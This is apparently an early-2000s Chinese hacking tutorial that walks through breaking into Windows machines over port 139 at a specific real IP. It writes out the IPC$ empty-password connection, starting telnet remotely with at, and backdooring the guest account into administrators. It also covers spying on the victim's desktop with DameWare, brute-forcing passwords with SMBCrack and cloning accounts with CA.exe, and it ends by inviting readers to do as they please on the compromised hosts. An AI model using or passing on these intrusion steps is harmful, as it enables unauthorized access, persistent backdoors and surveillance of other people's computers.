入侵139端口实例

今天打星际，被一高手反复摧残，郁闷ing……于是上网活动一下。打开肉鸡猎手，在开始IP和结束IP中填入想扫描的IP端，点击开始，不一会儿之后，两台肉鸡出现在我们面前(图一)。

现在，让我们点击“开始”→“运行”→cmd.exe，打开可爱的命令行窗口。

输入：net use //218.80.236.37/IPC$ "" /user:administrator，提示“命令成功完成”。哈哈，现在我们就建立好了IPC$(远程管理连接)，

再来，取得远程主机时间：net time //218.80.236.37 显示: //218.80.236.37 的当前时间是 2003/5/22 上午 10:32。

然后用at命令启动远程主机的telent服务，at //218.80.236.37 10:32 telent，方便我们登陆远程主机。(注意! 建立IPC$连接和登陆远程主机是截然不同的两个概念，建立IPC$是为了能够使用at 命令来启动telent服务，几乎所有的命令都是在登陆远程主机之后使用，否则都是对你自己的计算机操作。)

然后，telent 218.80.236.37 23，出现如图提示窗口(图二)，敲入administrator 回车两次，出现了命令提示符，现在开始我们敲入的命令都会在远程计算机上执行。先输入net user 看看有哪些用户，这里我们只发现了administrator,guest,Iuser_KiKi三个用户，考虑到下次进入该主机时用户可能已经更改了administrator 的密码，为了能够顺利地再次进入，我们需要留下一个小后门。

通常我们会这样做，

输入net user guest/active:yes 激活guest 用户(guest用户系统内置的，因此每台计算机上都有，默认禁用此用户)。

net user guest 12345 更改guest的密码为12345，

net localgroup administrators guest /add把guest的权限提升为管理员权限，这样下次来的时后可以取得对远程主机的完全控制权。

留好了后门之后，你可以好好地在他的机子上逛一圈，看看有没有什么有趣的东西，顺便把你刚学的命临实际操作一下。如果你觉得命令行实在不方便，那么跟我来，我将带你进入丰富多采的图形界面。现在，在命临行窗口下输入exit，显示“断开远程主机的连接”，我们用exit这个命令离开了远程主机，回到自己的机器上，点击载下来的DameWare，出现如图所示界面(图三)，在"host name"里填上对方IP，输入用户名administrator和密码(现在密码为空，所以不填)，点击"Connect"，然后等待DameWare拷贝文件，启动服务等一系列动作完成。一会而之后，出现如图(图四)窗口，里面现示的就是远程主机的桌面，别人的一举一动你都可以看见，你还可以接管他的鼠标，是不是挺有意思的呢？但是记住，我们是来学习技术的，并不是来破坏的，所以千万别做什么坏事哦。

　　文章写到这里就告一段落了，其实对于入侵实例，有几点我想特别提一下：
　　(1)肉鸡猎手只能搜密码为空的主机，所以只能一开始让我们练练手。一般要对139端口攻击，我们使用SMBCrack这个软件，它是针对一台主机进行密码的暴力猜解的，速度非常快，在我机器上猜了24万个密码只用了半小时左右，命令行窗口下输入smbcrack 218.80.236.37 administrator words.txt 139 就开始猜解密码了。218.80.236.37这里改为你要攻击的IP，words.txt是字典，里面含有很多口令，你可以自己上网找找，好的字典能提高入侵的成功率。
　　(2)telent上对方的机器后，我们为了更加隐蔽地留下后门，常常使用CA.exe，CA是(clone administrator)的缩写，看名字你就应该知道，它可以把其它用户克隆成管理员，CA.exe //218.80.236.37 Administrator Password IUSR_VICTIM SetNewPass，把IUSR_VICTIM克隆成为管理员，密码是SetNewPass,克隆完成之后，一般是无法发现的，所以隐蔽性非常高。
　　(3)at 这个命令有点搞笑，很多人先net view //IP 看了时间后，再用at 来启动对方程序却常常失败，这是因为很多人都不知道，用net view //IP 得到的时间不能直接用于at，这涉及到+12的问题，如果你看到对方的时间是 下午 3:00，那么at 应该这样使用at //IP 15:00 telent。
　　好了，就说到这里了。相信看了本文之后，各位都能够成功地对139端口进行入侵，至于进去之后做什么，各位就自己发挥吧。